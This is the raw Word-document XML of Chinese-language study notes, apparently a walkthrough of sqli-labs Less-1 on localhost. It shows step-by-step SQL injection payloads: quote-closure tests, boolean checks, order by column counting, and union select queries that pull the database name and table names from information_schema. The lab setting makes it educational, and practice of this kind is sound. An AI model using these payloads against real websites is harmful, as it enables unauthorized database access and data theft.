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1F63A" w14:textId="10866CE3" w:rsidR="009A1AF3" w:rsidRDefault="005F5FF4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断字符类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100BF84A" w14:textId="4BF6818B" w:rsidR="005F5FF4" w:rsidRDefault="00B837E1">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="005F5FF4" w:rsidRPr="00CE0D17">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://localhost/bachang/sqli-labs-master/Less-1/?id=3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005F5FF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断是否为数字型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD49B5F" w14:textId="76EC58E4" w:rsidR="005F5FF4" w:rsidRDefault="00B837E1">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="005F5FF4" w:rsidRPr="00CE0D17">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://localhost/bachang/sqli-labs-master/Less-1/?id=3asdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005F5FF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断是否为字符串型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641B12B2" w14:textId="4B919C5A" w:rsidR="005F5FF4" w:rsidRDefault="005F5FF4">
      <w:r>
        <w:t>?id=1asdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C280EE6" w14:textId="47C25DF1" w:rsidR="005F5FF4" w:rsidRDefault="005F5FF4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有报错：字符型，无闭合或闭合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069AC171" w14:textId="341360E4" w:rsidR="005F5FF4" w:rsidRDefault="005F5FF4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无报错：字符型，再判断闭合方式，</w:t>
      </w:r>
      <w:r>
        <w:t>’ “ ‘) “)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFE7B2C" w14:textId="36AA0991" w:rsidR="006D7F99" w:rsidRDefault="006D7F99">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F80E791" wp14:editId="1F54A7C4">
            <wp:extent cx="6760798" cy="1938866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4727" cy="19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24C1" w14:textId="73F26D36" w:rsidR="006D7F99" w:rsidRDefault="006D7F99">
      <w:r w:rsidRPr="006D7F99">
        <w:t>''3asdf'' LIMIT 0,1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676F984C" w14:textId="66B0DF41" w:rsidR="006D7F99" w:rsidRDefault="006D7F99" w:rsidP="006D7F99">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从右往左看如果为</w:t>
      </w:r>
      <w:r>
        <w:t>’)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么闭合方式就是</w:t>
      </w:r>
      <w:r>
        <w:t>’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A71A192" w14:textId="493CE58A" w:rsidR="006D7F99" w:rsidRDefault="006D7F99" w:rsidP="006D7F99">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="403EC363" wp14:editId="3C470E94">
            <wp:extent cx="5481146" cy="1346200"/>
            <wp:effectExtent l="0" t="0" r="571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48" cy="13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8F7E" w14:textId="77777777" w:rsidR="006B6F95" w:rsidRDefault="006B6F95">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36549F4A" w14:textId="77205075" w:rsidR="006D7F99" w:rsidRDefault="006D7F99">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>验证漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAFBDD1" w14:textId="2212AA48" w:rsidR="008312CD" w:rsidRDefault="008312CD">
      <w:r w:rsidRPr="008312CD">
        <w:t xml:space="preserve">?id=1' and </w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="008312CD">
        <w:t xml:space="preserve"> --+</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常显示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7C30E5" w14:textId="7B23BC27" w:rsidR="008312CD" w:rsidRDefault="008312CD">
      <w:r w:rsidRPr="008312CD">
        <w:t xml:space="preserve">?id=1' and </w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="008312CD">
        <w:t xml:space="preserve"> --+</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无显示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42716835" w14:textId="0451062C" w:rsidR="008312CD" w:rsidRDefault="008312CD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37E84865" wp14:editId="651F1E68">
            <wp:extent cx="2886068" cy="32088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9814" cy="324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7591" w14:textId="722FE8E0" w:rsidR="008312CD" w:rsidRDefault="008312CD">
      <w:r w:rsidRPr="008312CD">
        <w:t>http://localhost/bachang/sqli-labs-master/Less-1/?id=1' and 2 --+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3305D42F" w14:textId="3E678123" w:rsidR="008312CD" w:rsidRDefault="006B6F95">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能够控制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语法是否执行，这里存在这个漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7221E200" w14:textId="18E80D05" w:rsidR="008312CD" w:rsidRDefault="008312CD"/>
    <w:p w14:paraId="59D9A4D1" w14:textId="7DA53FB9" w:rsidR="008312CD" w:rsidRPr="00385BB6" w:rsidRDefault="006B6F95">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385BB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>判断列数以及回显位</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478A9A50" w14:textId="652735B2" w:rsidR="00385BB6" w:rsidRDefault="00385BB6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C43E0D5" wp14:editId="68C85B09">
            <wp:extent cx="3449576" cy="3835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2210" cy="38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9D08" w14:textId="7ACB75B6" w:rsidR="006B6F95" w:rsidRDefault="00385BB6">
      <w:r w:rsidRPr="00385BB6">
        <w:lastRenderedPageBreak/>
        <w:t>http://localhost/bachang/sqli-labs-master/Less-1/?id=1 and 2' order by 3 --+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6FB52F" w14:textId="13566627" w:rsidR="00385BB6" w:rsidRDefault="00385BB6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列</w:t>
      </w:r>
      <w:r w:rsidR="00850062">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不存在则会提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFC8CE0" w14:textId="2D9C598B" w:rsidR="00385BB6" w:rsidRDefault="00385BB6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50E213AE" wp14:editId="7BC6D3EE">
            <wp:extent cx="3445933" cy="3831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3959" cy="38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ED3B" w14:textId="3DC03DB7" w:rsidR="00385BB6" w:rsidRDefault="00850062">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里只有三列所以采用联合查询查看一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C5B18" w14:textId="0F9376B0" w:rsidR="00850062" w:rsidRDefault="00850062">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法;</w:t>
      </w:r>
      <w:r>
        <w:t>?id=-1’ union select 1,2,3 --+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273CEEB8" w14:textId="5DD9B75D" w:rsidR="00CB0939" w:rsidRDefault="00CB0939">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="045C6453" wp14:editId="47D63912">
            <wp:extent cx="3243972" cy="360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5211" cy="361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6B1C" w14:textId="15BD5C9B" w:rsidR="00CB0939" w:rsidRDefault="00CB0939">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1不是回显位，回显位是我们能看到的数字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9665A0" w14:textId="4A024601" w:rsidR="00CB0939" w:rsidRDefault="00CB0939">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>所以我在2和3的位置进行查询库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A48B9E9" w14:textId="1C537115" w:rsidR="00CB0939" w:rsidRDefault="00CB0939">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法如下：?</w:t>
      </w:r>
      <w:r>
        <w:t>id=-1’ union select 1,database(),3 --+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39099E06" w14:textId="1949E38D" w:rsidR="00CB0939" w:rsidRDefault="00CB0939">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到数据库的名字如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4196CB6A" w14:textId="54447219" w:rsidR="00CB0939" w:rsidRDefault="00CB0939">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="377EEE6F" wp14:editId="2AB5A6A3">
            <wp:extent cx="3632200" cy="4038450"/>
            <wp:effectExtent l="0" t="0" r="635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4848" cy="40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B9DF" w14:textId="7AD78988" w:rsidR="002A72E2" w:rsidRDefault="00CB0939">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取表名语法如下：</w:t>
      </w:r>
      <w:r w:rsidR="002A72E2">
        <w:t xml:space="preserve">?id=-1’ union select 1,(select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002A72E2">
        <w:t>group_concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A72E2">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002A72E2">
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A72E2">
        <w:t xml:space="preserve">)from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002A72E2">
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A72E2">
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002A72E2">
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A72E2">
        <w:t>=database()),3 --+ (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002A72E2">
        <w:t>group_concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A72E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002A72E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidR="002A72E2">
        <w:t>_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A72E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据当成字符串输出出来</w:t>
      </w:r>
      <w:r w:rsidR="002A72E2">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E166B8" w14:textId="439F72CD" w:rsidR="002A72E2" w:rsidRDefault="002A72E2"/>
    <w:sectPr w:rsidR="002A72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D16"/>
    <w:rsid w:val="000D0B35"/>
    <w:rsid w:val="002A72E2"/>
    <w:rsid w:val="00385BB6"/>
    <w:rsid w:val="003909D8"/>
    <w:rsid w:val="005F5FF4"/>
    <w:rsid w:val="006B6F95"/>
    <w:rsid w:val="006D7F99"/>
    <w:rsid w:val="00776EFC"/>
    <w:rsid w:val="008312CD"/>
    <w:rsid w:val="00850062"/>
    <w:rsid w:val="009A1AF3"/>
    <w:rsid w:val="009F6D16"/>
    <w:rsid w:val="00B837E1"/>
    <w:rsid w:val="00CB0939"/>
    <w:rsid w:val="00D55B72"/>
    <w:rsid w:val="00E9425D"/>
    <w:rsid w:val="00F75A11"/>
    <w:rsid w:val="00F96D2E"/>
    <w:rsid w:val="00FE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354E8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A7F04B0E-E1D3-41F3-A669-DA2B4D7A5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semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FE4D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semiHidden/>
    <w:rsid w:val="00FE4D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F5FF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F5F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/bachang/sqli-labs-master/Less-1/?id=3asdf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localhost/bachang/sqli-labs-master/Less-1/?id=3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141</Words>
  <Characters>806</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0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网 外狂徒.org</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>网 外狂徒.org</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-21T07:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-26T08:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>